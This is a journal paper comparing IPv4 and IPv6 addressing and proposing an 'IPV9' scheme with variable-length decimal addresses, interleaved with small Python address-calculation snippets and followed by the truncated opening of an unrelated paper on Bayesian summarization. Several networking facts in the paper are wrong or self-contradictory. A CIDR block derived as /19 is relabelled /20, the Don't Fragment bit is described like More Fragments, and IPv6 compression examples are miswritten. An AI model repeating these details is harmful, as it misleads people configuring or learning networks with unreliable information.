work_23qh3ethwvhxtazlivq7izfvwa ---- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 48 Research on IPv4, IPv6 and IPV9 Address Representation YURY Halavachou Department of the International Relations Belarusian State University of Transport Republic of Belarus 34, Kirova street, Gomel, 246653 Republic of Belarus e-mail: oms@bsut.by Wang Yubian Department of Railway Transportation Control Belarusian State University of Transport 34, Kirova street, Gomel, 246653 Republic of Belarus e-mail: alika_wang@mail.ru Abstract—The new generation network architecture (IPV9) is designed to solve a series of problems such as the shortage of address space and the danger of information security. IPv4 addresses have a length of 32 bits and a theoretically expressible address space of 232, while IPv6 addresses extend to 128 bits and theoretically an address space of 2128. In this paper, by studying IPv4, IPv6 address structure focuses on the new generation of network IPV9 address representation method. This method adopts the address coding method of the variable-length and variable-position, ranging from 16 bits to 2048 bits. Moreover, it adopts the mechanism of verification before communication, and relies on the method of assigning addresses to the computers on the Internet with full character codes. It redefines the address structure of the future Internet and provides new solutions for the Internet of things and the Internet of everything. Keywords-IPv4; IPv6; IPV9; Address Structure I. NETWORK ADDRESS An interconnected network is made up of LAN with interconnected nodes, also known as hosts or routers. Each device has a physical address connected to a network with a MAC layer address and a logical Internet address. Because a network address can be logically assigned to any network device, it is also called a logical address. Internet addresses are assigned by the Internet Corporation for Assigned Names and Numbers. The association appoints three local organizations - INTERNIC, RIPENCC and APNIC - to carry out location assignments in North America, Europe and the Asia Pacific region. The purpose of this uniform allocation is to ensure that network addresses are globally unique. II. ADDRESS SPACE FOR IPV4 The entire Internet is a single and abstract network. An IP address is a worldwide unique 32-bit identifier assigned to each interface of every host (or router) on the Internet. The structure of IP addresses makes it easy to address them on the Internet. A. The base header of IPv4 The base first format design of IPv4 is shown in Figure 1. DOI: 10.21307/ijanmc-2019-047 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 49 Figure 1. IP datagram format Figure 1 shows. The first line of the above section indicates the bits occupied by each field in the header format. The whole header format is divided into fixed part (20 bytes in total) and variable part. The variable part is to increase the function of IP datagram, but the variable header length of IP datagram also increases the overhead of each router to process datagram. The following explains the role of the fields in the base IPv4 header. 1) Version. IP Version. 2) Header Length (HL). It can represent a maximum decimal value of 15 and the most commonly used header length of 20 bytes (header length of 0101). 3) Differentiated services. It is used to get better service. 4) Total Length. It refers to the length of the sum of the radical and the data. 5) Identification. 
It holds the value of the counter that accumulates the number of datagram. 6) Flag. It is a total of 3 bits, the lowest bit (More Fragment) means if there is still fragmentation, the middle bit (Don't Fragment) means if there is still fragmentation. 7) Fragment Offset. It represents the relative position of a slice in the original grouping after the longer grouping is fragmented. 8) Time To Live. It represents the lifetime of the datagram in the network. 9) Protocol. It indicates which protocol is used for the data carried by the datagram. 10) Head Checksum. As the datagram passes through each router, the router calculates the sum again. B. Classified IP addresses Classification of IP address is the most base addressing method, the core of which is to divide the IP address into several fixed classes, each of which is composed of two fixed-length fields: network-id and host-id. The first field indicates the network to which the host or router is connected, and the network number must be unique. The second field identifies the host or router, and a host number must be unique within the range indicated by the network number it is on. Thus, the uniqueness of an IP address is ensured. This two-level IP address can be recorded as: IP address: : ={< network number >, < host number >}, where ": : =" means "defined as". Figure 2 below shows the network number field and host number field of various IP addresses: International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 50 Figure 2. Network number field and host number field in IP address Figure 2 shows: The network number field of address of class A, B and C (the field is pink in the figure) is 1, 2 and 3 word length respectively, while the category bit of 1-3 bits in the front of the network number field is specified as 0, 10 and 110 respectively. The host number fields of class A, B, and C addresses are 3, 2, and 1 word long, respectively. Class D addresses (the first four bits are 1110) are used for multicast (one-to-many communication). Class E addresses (the first four bits are 1111) are reserved for later use. A dotted decimal notation is presented to improve the readability of IP addresses when it is 32-bit binary code. In IP addresses, every eight bits is represented in decimal, with a dot inserted between the digits. Figure 3 illustrates the convenience of this method. Figure 3. Illustrates the decimal system C. Improvement of base addressing method Because the classified IP address has defects, the IP address addressing method also goes through the following two historical stages. 1) Subnet partitioning Subnet division mainly includes two contents, one is to make the IP address from two to three levels, improve the utilization of IP address space, improve International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 51 network performance and enhance the flexibility of IP address; The second is the use of subnet mask, subnet mask AND IP address bitwise "AND" operation (AND) to get the network address, so as to facilitate the datagram sent to the destination network. a) Subnet idea  The subnet is still represented as a network. 
 Borrow some bits from the host number of the network as the subnet number, and the two-level IP address becomes the three-level IP address within a certain range, which can be expressed as: IP address: : ={< network number >,< subnet number >,< host number >}  The IP datagram can be sent to the router according to the destination network number, and then the router can find the destination subnet according to the network number and subnet number, and deliver the IP datagram to the destination host. b) Subnet mask A subnet mask, also known as a network mask or address mask, is a 32-bit address that consists of a string of one’s followed by a string of zeros. It is used to indicate which bits are the subnet and host that identify an IP address. The following example illustrates the role of subnet masks: [Example] the known IP address is 132.32.63.23, and the subnet mask is 255.255.224.0.Try to find the network address. [Answer]The subnet mask is 11111111 11111111 11100000 00000000, because the first two bytes of the mask are all 1, so the first two bytes of the network address can be written as 132.32.The fourth byte of the subnet mask is all 0, so the fourth byte of the network address is 0.It can be seen that this question only needs to calculate the third byte in the address, and we can easily obtain the network address by using binary representation of the third byte of IP address and subnet mask, as shown in figure 4 below: Figure 4. Solving process of network address 2) Classless Inter-Domain Routing (constitute super-netting) The main characteristics of Classless Inter-Domain Routing (CIDR) are as follows: a) CIDR eliminates the traditional concept of classified address and subnet division. CIDR divides the IP address into a network-prefix and a host number, denoted by: IP address: : ={< network prefix >, < host number >} CIDR also uses slash notation. It is to add "/" after the IP address, and write the number of network prefix after the slash, for example: International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 52 128.85.36.17/19 = 10000000, 01010101, 00100100, 00010001 b) CIDR address block CIDR combines the same network prefix with consecutive IP addresses to form a "CIDR address block", which can be specified by the smallest address in the address block and the number of digits in the network prefix. For example: 128.85.36.17/19 in the address block: The minimum address is 128.85.32.0/19=10000000 01010101 00100000 00000000 The maximum address is 128.85.63.255/19=10000000 01010101 00111111 So the above address can be recorded as 128.85.32.0/20, referred to as "/20 address block" for short. The routing table can use a CIDR address block containing multiple addresses to query the destination network. This aggregation of addresses is known as routing aggregation and is also known as composition supernettingting. III. IPV6 ADDRESS SPACE IPv6 is the sixth version of the Internet protocol. IPv6 USES 128-bit addresses (2128 bits), which is about 3.4 x 1038 addresses, but IPv6 addresses up to 128 bits in length does not say how many addresses there are per square meter of the earth. Rather, IPv6 addresses were designed to be large in size, with the aim of further subdividing them into layered routing domains that reflect the topology of the modern Internet. Using a 128-bit address space provides multiple levels of hierarchy and flexibility in designing hierarchical addressing and routing, which is lacking in the current ipv4-based Internet. 
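Before moving further into IPv6, the IPv4 subnet-mask and CIDR arithmetic worked through above can be checked with a few lines of Python. This is only an illustrative sketch using the standard ipaddress module, reproducing the worked example (132.32.63.23 with mask 255.255.224.0) and the 128.85.36.17/19 address block.

```python
import ipaddress

# Worked example above: AND the mask 255.255.224.0 with 132.32.63.23.
iface = ipaddress.IPv4Interface("132.32.63.23/255.255.224.0")
print(iface.network.network_address)   # 132.32.32.0 -- the network address found in Figure 4

# CIDR address block above: 128.85.36.17/19.
block = ipaddress.IPv4Interface("128.85.36.17/19").network
print(block.network_address)           # 128.85.32.0   (smallest address in the block)
print(block.broadcast_address)         # 128.85.63.255 (largest address in the block)
print(block.num_addresses)             # 8192 = 2**(32 - 19) addresses in the block
```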
IPv6 addresses consist of global routing prefixes, subnet ids, and interface ids. Where the global routing prefix is used to specify a site, the subnet ID is used to specify a link within the site, and the interface ID is used to specify an interface on the link. A. Base IPv6 headers IPv6 datagram with multiple optional extension headers is shown in figure 5, and IPv6 base headers are shown in figure 6. Figure 5. IPv6 datagram with multiple optional extension headers Figure 6. Basic IPv6 header with a length of 40 bytes International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 53 As shown in figure 6, the first line of the figure indicates the bit occupied by each field in the header format. Compared to IPv4, IPv6 fixed the base header with 40 bytes, eliminated many unnecessary fields, and reduced the number of private segments in the header to 8 (although the header length was doubled). The following explains the function of each field in the IPv6 basic header: 1) Version. It specifies the version of the protocol. 2) Traffic Class. It distinguishes between different IPv6 datagram categories or priorities. 3) Flow Label. It is a new mechanism for IPv6 to support pre-allocation of resources. 4) Payload Length. It specifies the number of bytes in an IPv6 datagram other than the base header. 5) Next Head. It is equivalent to the IPv4 protocol field or optional field. 6) Hop Limit. It is used to prevent datagram from being in the network indefinitely. B. IPv6 address representation method 1) Colon hexadecimal form Preferred form “n:n:n:n:n:n:n:n”.Each n represents a 16-bit value and is hexadecimal, separated by a colon. For example: “3FFE:FFFF:7654:FEDA:1245:BA98:3210:4562”. 2) Compressed form Writing a long string of zeros can be simplified using a compressed form, where a single contiguous sequence of zeros is represented by a double colon, “: : ”.This symbol can only appear once in an address. For example, the local link unicast address FE80:0:0:0:0:0:0:10 is shortened as“FE80::/10”, and the multicast address FFDE:0:0:0:0:0:0:101 is shortened as “FFED::101”.Loop address 0:0:0:0:0:0:0:1compression form “::1”. An unspecified address 0:0:0:0:0:0:0:0 is shortened as “::”. 3) Mixed form This form combines IPv4 and IPv6 addresses. In this case, the address format is “n:n:n:n:n:n:d.d.d.d”. Where each “n” represents the 16-bit value of the IPv6 address and is represented in hexadecimal, and each “d” represents the 8-bit value of the IPv4 address and is represented in decimal. C. Transition from IPv4 to IPv6 The transition from IPv4 to IPv6 can only be done incrementally, because the number of routers using IPv4 across the Internet is so large that it is impractical to set a cut-off point to upgrade the system. There is also backward compatibility when installing a new IPv6 system.IPv6 system must be able to complete the IPv4 system to receive, forward IP datagram and routing selection. Here are three strategies for transitioning to IPV6: 1) Dual stack Prior to the full transition to IPv6, there were stacks of IPv4 and IPv6 on some hosts or routers. Dual stack hosts or routers can communicate with both IPv4 and IPv6 systems. 2) Tunneling The point of this technique is that the IPv6 datagram is disguised as an IPv4 datagram, and the entire IPv6 datagram becomes the data portion of the IPv4 datagram. 
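A purely schematic sketch of this tunneling step may help; it does not build real packet headers, and both helper names are hypothetical. The point is only that the complete IPv6 datagram rides as the data portion of an outer IPv4 packet between the two tunnel endpoints and is unwrapped on the far side.

```python
def tunnel_encapsulate(ipv6_datagram: bytes, outer_ipv4_header: bytes) -> bytes:
    """Entering the tunnel: wrap the whole IPv6 datagram as the data
    portion of an IPv4 packet so that IPv4-only routers can forward it."""
    return outer_ipv4_header + ipv6_datagram

def tunnel_decapsulate(ipv4_packet: bytes, ipv4_header_len: int = 20) -> bytes:
    """Leaving the tunnel: strip the outer IPv4 header and hand the original
    IPv6 datagram back to the host's IPv6 protocol stack."""
    return ipv4_packet[ipv4_header_len:]
```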
This allows unimpeded access to the IPv4 network and, upon leaving the IPv4 network, transfers the data portion of the IPv4 datagram to the host’s IPv6 protocol stack.IPv6 datagram is submitted to the IPv6 protocol stack to complete the communication. 3) Network address conversion/protocol conversion technology Network Address Translation/Protocol Translation technology NAT-PT (Network Address Translation - Protocol Translation) is combined with SIIT Protocol Translation, dynamic Address Translation (NAT) under traditional IPv4 and appropriate application layer gateway (ALG).It enables communication between International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 54 hosts with only IPv6 installed and most applications with only IPv4 machines installed. IV. THE RESEARCH STATUS OF IPV4 AND IPV6 A. Current status of IPv4 Due to the allocation of IPv4 addresses adopts the principle of "first come, first served, distributed according to needs", the uneven distribution makes the address allocation has a huge loophole, which makes many countries and regions have insufficient IP address resources. With the development of Internet, especially the explosive growth of scale, some inherent defects of IPv4 are gradually exposed, mainly focusing on address exhaustion, rapid expansion of routing table to the bottleneck, security and service quality is difficult to guarantee, and serious waste of IPv4 address structure. The design of IPv4 protocol does not consider the real-time transmission of audio stream and video stream.IPv4 does not provide encryption and authentication mechanisms, so the secure transmission of confidential data resources cannot be guaranteed. B. Current status of IPv6 Due to the limitations of the technology era, there are many defects in the design idea of the address structure of IPv6.The richness of the IPv6128 bit address length makes it more than just a matter of extending the address. Instead of following the principle of transparency between different protocol layers, IP addresses, which should belong to the protocol of the network layer, are mixed with physical layer addresses and application layer, resulting in a series of fatal consequences. V. IPV9 ADDRESS CODE IPV9 not only expands the length of IP address, but also makes the network support more address levels. In addition, the method of address coding method of the variable-length and variable-position is adopted, and the parsing link is cancelled. The formal text representation method used by human is directly converted into machine language, which actually reduces the overhead of network. A. IPV9 header format IPV9 header format design is shown in figure 7. Figure 7. Header format of IPV9 Figure 7 design explanation is as follows: 1) Version. It has a length of four bits. Internet protocol version number, for IPV9, this field must be 9. 2) Traffic Class. It has a length of 8 bits. The three bits high are used to specify the length of the address, and the value is 0 to 7, which is the power of 2.The address length is 1Byte ~ 128Byte.The default value is 256 bits, where 0 is 16 bits, 1 is 32 bits, 2 is 64 bits, 3 is 128 bits, 4 is 256 bits, 5 is 512 bits, 6 is 1024 bits, International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 55 and 7 is 2048 bits. 
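As a small sketch of this length encoding (the mapping below follows the text's description of IPV9 rather than a published standard, and the function name is ours), the high three bits of the Traffic Class field select one of eight address lengths, 16 x 2^code bits:

```python
def ipv9_address_length_bits(code: int) -> int:
    """Map the high 3 bits of the IPV9 Traffic Class field to an address
    length in bits: 0 -> 16, 1 -> 32, 2 -> 64, ..., 7 -> 2048."""
    if not 0 <= code <= 7:
        raise ValueError("address-length code is a 3-bit value (0-7)")
    return 16 << code            # 16 * 2**code bits

# The default 256-bit address corresponds to code 4.
assert ipv9_address_length_bits(4) == 256
assert [ipv9_address_length_bits(c) for c in range(8)] == [16, 32, 64, 128, 256, 512, 1024, 2048]
```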
The last five bits specify the communication class and authentication for the source and destination addresses.0 through 15 are the priority values, where 0 through 5 are used to specify the priority class for the traffic.6 through 7 are used to specify a communication method for authentication before communication, which is used by the packet sender for traffic control and whether authentication of source and destination addresses is required.8 through 14 are used to specify absolute traffic that will not fall back when congestion is encountered.15 for virtual circuits.16 and 17 respectively assign audio and video, called absolute value, to ensure the uninterrupted transmission of audio and video. The other values are reserved for future use. 3) Flow Label. It is 20 bits long and is used to identify packages that belong to the same business flow. 4) Payload Length. It has a length of 16 bits, including the net payload of bytes, which is the number of bytes contained in the packet behind the IPV9 header. 5) Next Header. Its length is 8 bits, and this field indicates the protocol type in the field following the IPV9 header. 6) Hop Limit. Its length is 8 bits, and this field is subtracted by one each time a node forwards a packet. 7) Source address. Its length is 8 bit ~ 2048 bit; specify IPV9 packet sender address, using variable length and location method. 8) Destination address. Its length is 8 bit ~ 2048 bit, and the destination address of IPV9 packet is specified. 9) Time. It is used to control the lifetime of the address in the header. 10) Identification code. It identifies the authenticity of the address in the header. B. Text representation of IPV9 addresses This paper has developed a unified method to represent IPV9 address, including "bracket decimal", "curly braces decimal" and "parentheses bracket". 1) Bracket decimal The bracket decimal can be expressed in the following two ways: Method 1: use "[]" when the length is 2048 bits. Where, the parentheses are expressed in decimal notation, and the length can be written in indefinite length. Method 2: length 256 able address in the form of representation is "y[y] [y] [y] [y] [y] [y]", where each y represents the address as a 32 bit part, and used the decimal representation. Because 232 = 4294967296. Each "y" represents a 32 bits portion of the address and is represented in decimal. The difference in decimal number of each of the range is 0 to 9, such as the first digit from left the range is 0 ~ 4, so you don't have the phenomenon of overflow. 2) Curly braces decimal This method divides the 256-bit address into four 64-bit decimal Numbers represented by curly braces separating them. The representation is "Z}Z}Z}Z", where each Z represents a 64-bit portion of the address and is represented in decimal. It's exactly the same as Y, but it's also compatible with Y, so you can mix the two. This approach makes it very convenient for IPv4 addresses to be compatible in IPV9.Such as: z}z}z}z; z}z}y]y]y]y; z}z}y]y]y]d.d.d.d; z}z}z}y]d.d.d.d; z}z}z}y]J.J.J.J; 3) Bracketed notation International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 56 Since IPV9 has an address length of 256 bits, whether you use four or eight segments, there are still many bits in each segment. For example: ...]00000000000000000000000000110100]... ...]01011111111111111111111111111111]... The above situation input cumbersome, prone to errors. For convenience, the parenthesis notation -- (K/L) is introduced. 
Where "K" means 0 or 1 and "L" means the number of 0 or 1.In this way, the above two examples can be abbreviated as: ...](0/26) of 110100]... ...]010 (1/29)]... 4) Text representation of address prefixes The IPV9 address scheme is similar to the CIDR (unclassified addressing) scheme of IPv4 in that the address prefix is used to represent the network hierarchy. On the representation of IPV9 address prefix, a representation similar to CIDR is adopted, whose form is as follows: IPV9 address/address prefixes length For example, Address prefix 1706[0[0[0[210[22[0 of 200 bits can be expressed as: 1706[0[0[0[210[22[0[0/200 5) IPV9 address type c) Pure IPV9 address The form is Y[Y[Y[Y[Y[Y[Y[Y Each “Y” represents a decimal integer from 0 to 232 =4294967296. d) IPV9 addresses compatible with IPv4 The form is: Y[Y[Y[Y[Y[Y[Y[D.D.D.D Each “Y” represents a decimal integer from 0 to 232 =4294967296. “D” represents a decimal integer between 0 and 255 from the original IPv4. e) IPV9 addresses compatible with Ipv6 The form is: Y[Y[Y[Y[X:X:X:X:X:X:X:X Each “Y” represents a decimal integer from 0 to 232 =4294967296.The “X” represents a hexadecimal number that originally Ipv6 ranged from 0000 to FFFF. f) Special compatibility address In order to guarantee the research results of IPv4 and Ipv6, IPV9 has designed some compatible addresses. The new compatibility address design idea is in this part of the address with the appropriate prefix form. In order to make their representation more convenient and ensure accuracy, the following abbreviations were introduced: y[y[y[y[x:x:x:x:x:x:d.d.d.d Where, each y represents the address as 32 bits, represented by decimal; Each “x” represents the original Ipv6 address of 16 bits, in hexadecimal; Each “d” represents the original IPv4 address of 8 bits, in decimal notation. g) [] full decimal address In order to facilitate the application of logistics code and full decimal address. Category number 5 is recommended. In the power of 10 to the power of 512, fixed length positioning method is adopted according to application needs. h) IPV9 address for transitional period IPV9 is compatible with IPv4 and IPv6 technical protocols for the Internet, but IPv4 and IPv6 technical protocols are not compatible with IPV9 in reverse. C. IPv4 and IPv6 transition to IPV9 In order to solve the IPv4 flat to IPV9 transition, special design IPV9 transition address. Transitioning IPv4 to a 232 address in the IPV9 address allows a small change to the current system to complete the transition. In IPV9, there is a section of J.J.J.J address, where each “J” represents a decimal number from 0 to 28 (0~255), where the preceding [7] can be omitted in the middle of the local address, that is, local users (or designated users) can use J.J.J.J directly, which is different from the original IPv4 D.D.D.D. At the same time, this part of the user in order to smooth the International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 57 transition to full decimal can be allocated at the same time decimal. In order to improve the software and hardware in the future, there is no need to re-address, such as [7]741852963 can be written into [7]44.55.199.35 can be directly used in a local IP network to write 44.55.199.35, so that the original terminal can be used. Interim IPV9 address system can be modified to the original IPv4 system. 
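The transitional example above, in which [7]741852963 is rewritten as [7]44.55.199.35, is simply a regrouping of one 32-bit value into four decimal octets. A minimal sketch of that conversion (the function names are ours, not part of any IPV9 specification):

```python
def to_jjjj(value: int) -> str:
    """Write a 32-bit transitional value as J.J.J.J, each J in 0-255."""
    assert 0 <= value < 2 ** 32
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))

def from_jjjj(text: str) -> int:
    """Inverse conversion from J.J.J.J back to a single decimal value."""
    parts = [int(p) for p in text.split(".")]
    assert len(parts) == 4 and all(0 <= p <= 255 for p in parts)
    return (parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3]

print(to_jjjj(741852963))         # 44.55.199.35, matching the example in the text
print(from_jjjj("44.55.199.35"))  # 741852963
```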
The IPv4 header is also used, but the version number is 9 to distinguish the original IPv4.However, users may use the original terminal equipment within the territory. IPV9 Header TCP/UDP Header data IPv4 Header IPV9 Header TCP/UDP Header data IPV9 Header TCP/UDP Header data Raw IPV9 datagrams The IPV9 header encapsulates the IPv4 header in the tunnel IPV9 datagrams restored through the tunnel IPV9 Host-1 IPv4/IPV9 Tunnel ROuter-R1 IPv4 Router-1 IPv4 Router-2 IPv4/IPV9 Tunnel ROuter-R2 IPV9 Host-2 Internet[IPv4] Figure 8. IPV9 is IPv4 compatible Figure 8 above means that it is possible to build the IPV9 backbone, provide application services and gradually upgrade the backbone network to IPV9 without affecting or modifying the existing terminal IPv4 applications.IPV9 inherited and transplanted most of the application functions on the existing IPv4 Internet, and successfully solved the development problem of IPV9 online application functions. Most of the existing Internet application functions can be copied to the IPV9 network, and began to enter the practical stage. At the same time, the application of IPV9 will continue to innovate and develop. D. Support IPV9 device working mode In the decimal network working group of scientific research, the current IPV9 support devices are ipv9-100m WIFI router, ipv9-1000m WI-FI router, ipv9-10000m router, ipv9-100g router, ipv9-linux client and ipv9-windows client. The IPV9 router network interface types include ordinary Ethernet interface, 4to9 interface (convert IPv4 packets into IPV9 packets according to custom mapping rules), 9to4 interface (convert IPV9 packets into IPv4 packets according to custom mapping rules) and sit interface (realize IPV9 data packets to be transmitted in the current IPv4 network. Implement 9over4, where IPV9 data over is the data portion of the IPv4 packet. The following takes IPV9 100/1000m WIFI router as an example to explain its working mode VPN. Under the VPN mode, most configuration of the router is completed by the background server, which is divided into IPv4 mode and IPV9 mode. In IPv4 mode, the router runs the NAT module, and the client (IPv4) accesses the Internet network in the same way as other IPv4 routers. When the client accesses the server in IPV9 backbone network, the VPN server will communicate with it. Although the pure IPV9 client is not supported in this mode, the communication between the client of WIFI router A and the client of WIF router B is supported. The data flow diagram is shown in figure 9 below: International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 58 (a) one-way access between IPv4 of VPN tunnel and Beijing backbone node (b) IPv4 reciprocal visits within the VPN tunnel Figure 9. (a) one-way access between IPv4 of VPN tunnel and Beijing backbone node; (b) IPv4 reciprocal visits within the VPN tunnel International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 59 In IPV9 mode, clients (IPv4) access the Internet network in the same way as other IPv4 routers. This mode supports the pure IPV9 client, but does not support the communication between the client of WIFI router A and the client of WIF router B, as shown in data flow figure 10. (a) IPV9 exchange visits between VPN tunnel and Beijing backbone node (b) IPV9 mutual visits within the VPN tunnel Figure 10. 
(a) IPV9 exchange visits between VPN tunnel and Beijing backbone node; (b) IPV9 mutual visits within the VPN tunnel International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 60 To sum up, IPV9 inherits most functions on the existing Internet. In the protection of IPv4 and IPv6 research results, address expansion, security verification and other operations. This makes IPV9 more competitive in the development of the Internet, and its functions will continue to develop with the development of technology. VI. SUMMARIZES Although the use of NAT (" network address translation "), CIDR (" classless inter-domain routing ") and other technologies can alleviate the IPv4 crisis to some extent. However, this does not fundamentally solve the problem, and at the same time, it will bring about new problems in cost, service quality, safety and other aspects, but create greater challenges. But the new generation network layer protocol IPv6 itself also has the corresponding question, causes it not to have the Omni-directional. In this situation, a new network will come into being, which not only represents the progress of people's technology, but also symbolizes people's dedication to new technology. This paper mainly designs and researches the new network address coding, compares the IPv4 and IPv6 address coding, and proposes a new address coding. This method solves the problem of address exhaustion thoroughly, and puts forward the theory of verification before communication, which solves the problems of current network address exhaustion and information security. It also describes the ipv9-compatible IPv4 working mode, which guarantees the existing research results, provides some new design ideas for new network addresses, and promotes the development of new network addresses. REFERENCES [1] RFC - Internet Standard. Internet Protocol, DARPA INTERNET PROGRAM PROTOCOL SPECIFICATION, RFC 791, 1981.09. [2] S. Deering, R. Hinden, Network Working Group.Internet Protocol, Version 6 (IPv6)-Specification, RFC-1883, 1995.12. [3] M. Crawford. Network Working Group.Transmission of IPv6 Packets over Ethernet Networks.RFC-2464, 1998.12. [4] J. Onions, Network Working Group.A Historical Perspective on the usage of IP version 9. RFC1606. 1994.04. [5] V. Cerf, Network Working Group. A VIEW FROM THE 21ST CENTURY, RFC1607. 1994.04. [6] Information technology-FutureNetwork-Problem statement and requirement-Part 5: Security, ISO/IEC DTR 29181-5,2014,12. [7] Wang Wenfeng, Xie Jianping,etc.Product and servicedigital identification format for information procession.SJ/T11603-2016, 2016.06. [8] S. Deering, R. Hinden, Internet Protocol, Version 6 (IPv6)-Specification, Network Working Group. RFC-1883, 1995.12. work_27d5tr326feydgcx32t4nhl424 ---- Transactions of the Association for Computational Linguistics, 1 (2013) 89–98. Action Editor: Noah Smith. Submitted 12/2012; Published 5/2013. c©2013 Association for Computational Linguistics. A Novel Feature-based Bayesian Model for Query Focused Multi-document Summarization Jiwei Li School of Computer Science Carnegie Mellon University bdlijiwei@gmail.com Sujian Li Laboratory of Computational Linguistics Peking University lisujian@pku.edu.cn Abstract Supervised learning methods and LDA based topic model have been successfully applied in the field of multi-document summarization. 
In this paper, we propose a novel supervised approach that can incorporate rich sentence features into Bayesian topic models in a principled way, thus taking advantage of both topic models and feature-based supervised learning methods. Experimental results on DUC2007, TAC2008 and TAC2009 demonstrate the effectiveness of our approach. 1 Introduction Query-focused multi-document summarization (Nenkova et al., 2006; Wan et al., 2007; Ouyang et al., 2010) can help users grasp the main idea of a document collection. In query-focused summarization, a specific topic description, such as a query, which expresses the most important topic information, is given together with the document collection, and a summary is generated according to that topic. Supervised models have been widely used in summarization (Li et al., 2009; Shen et al., 2007; Ouyang et al., 2010). Supervised models usually regard summarization as a classification or regression problem and use various sentence features to build a classifier from labeled negative and positive samples. However, existing supervised approaches seldom exploit the intrinsic structure among sentences. This disadvantage usually gives rise to serious problems such as unbalanced content and low recall in summaries. Recently, LDA-based (Blei et al., 2003) Bayesian topic models have been widely applied in multi-document summarization because Bayesian approaches can offer clear and rigorous probabilistic interpretations for summaries (Daume and Marcu, 2006; Haghighi and Vanderwende, 2009; Jin et al., 2010; Mason and Charniak, 2011; Delort and Alfonseca, 2012). Existing Bayesian approaches label sentences or words with topics, and sentences that are closely related to the query or that generalize the documents well are selected into summaries. However, the LDA topic model suffers from the intrinsic disadvantage that it only uses word frequency for topic modeling and cannot use other useful text features such as position or word order (Zhu and Xing, 2010). For example, the first sentence in a document may be more important for the summary, since it is more likely to give a global generalization of the document. It is hard for the LDA model to consider such information, so useful information is lost. It naturally follows that we may improve summarization performance by making full use of both useful text features and the latent semantic structure provided by the LDA topic model. One related work is from Celikyilmaz and Hakkani-Tur (2010). They built a hierarchical topic model called Hybhsum based on LDA for topic discovery and assumed this model can produce appropriate scores for sentence evaluation. The scores are then used for tuning the weights of various features that are helpful for summary generation. Their work made a good step toward combining topic models with feature-based supervised learning. However, it is unclear whether a topic model based only on word frequency is good enough to generate an appropriate sentence score for regression. In fact, how to incorporate features into the LDA topic model has been an open problem. Supervised topic models such as sLDA (Blei and McAuliffe, 2007) give us some inspiration. In sLDA, each document is associated with a labeled feature, and sLDA can integrate such a feature into LDA for topic modeling in a principled way.
With reference to the work of supervised LDA models, in this paper, we propose a novel sentence feature based Bayesian model S-sLDA for multi- document summarization. Our approach can natu- rally combine feature based supervised methods and topic models. The most important and challeng- ing problem in our model is the tuning of feature weights. To solve this problem, we transform the problem of finding optimum feature weights into an optimization algorithm and learn these weights in a supervised way. A set of experiments are con- ducted based on the benchmark data of DUC2007, TAC2008 and TAC2009, and experimental results show the effectiveness of our model. The rest of the paper is organized as follows. Sec- tion 2 describes some background and related works. Section 3 describes our details of S-sLDA model. Section 4 demonstrates details of our approaches, including learning, inference and summary gener- ation. Section 5 provides experiments results and Section 6 concludes the paper. 2 Related Work A variety of approaches have been proposed for query-focused multi-document summarizations such as unsupervised (semi-supervised) approaches, supervised approaches, and Bayesian approaches. Unsupervised (semi-supervised) approaches such as Lexrank (Erkan and Radex, 2004), manifold (Wan et al., 2007) treat summarization as a graph- based ranking problem. The relatedness between the query and each sentence is achieved by impos- ing querys influence on each sentence along with the propagation of graph. Most supervised ap- proaches regard summarization task as a sentence level two class classification problem. Supervised machine learning methods such as Support Vector Machine(SVM) (Li, et al., 2009), Maximum En- tropy (Osborne, 2002) , Conditional Random Field (Shen et al., 2007) and regression models (Ouyang et al., 2010) have been adopted to leverage the rich sentence features for summarization. Recently, Bayesian topic models have shown their power in summarization for its clear probabilistic interpretation. Daume and Marcu (2006) proposed Bayesum model for sentence extraction based on query expansion concept in information retrieval. Haghighi and Vanderwende (2009) proposed topic- sum and hiersum which use a LDA-like topic model and assign each sentence a distribution over back- ground topic, doc-specific topic and content topics. Celikyilmaz and Hakkani-Tur (2010) made a good step in combining topic model with supervised fea- ture based regression for sentence scoring in sum- marization. In their model, the score of training sentences are firstly got through a novel hierarchi- cal topic model. Then a featured based support vec- tor regression (SVR) is used for sentence score pre- diction. The problem of Celikyilmaz and Hakkani- Turs model is that topic model and feature based re- gression are two separate processes and the score of training sentences may be biased because their topic model only consider word frequency and fail to con- sider other important features. Supervised feature based topic models have been proposed in recent years to incorporate different kinds of features into LDA model. Blei (2007) proposed sLDA for doc- ument response pairs and Daniel et al. (2009) pro- posed Labeled LDA by defining a one to one corre- spondence between latent topic and user tags. Zhu and Xing (2010) proposed conditional topic random field (CTRF) which addresses feature and indepen- dent limitation in LDA. 
3 Model description 3.1 LDA and sLDA The hierarchical Bayesian LDA (Blei et al., 2003) models the probability of a corpus on hidden topics as shown in Figure 1(a). Let K be the number of topics , M be the number of documents in the cor- pus and V be vocabulary size. The topic distribution of each document θm is drawn from a prior Dirichlet distribution Dir(α), and each document word wmn is sampled from a topic-word distribution φz spec- ified by a drawn from the topic-document distribu- tion θm. β is a K×M dimensional matrix and each βk is a distribution over the V terms. The generat- ing procedure of LDA is illustrated in Figure 2. θm is a mixture proportion over topics of document m and zmn is a K dimensional variable that presents the topic assignment distribution of different words. Supervised LDA (sLDA) (Blei and McAuliffe 2007) is a document feature based model and intro- 90 Figure 1: Graphical models for (a) LDA model and (b) sLDA model. 1. Draw a document proportion vector θm|α ∼ Dir(α) 2. For each word in m (a)draw topic assignment zmn|θ ∼ Multi(θzmn ) (b)draw word wmn|zmn,β ∼ Multi(βzmn ) Figure 2: Generation process for LDA duces a response variable to each document for topic discovering, as shown in Figure 1(b). In the gener- ative procedure of sLDA, the document pairwise la- bel is draw from 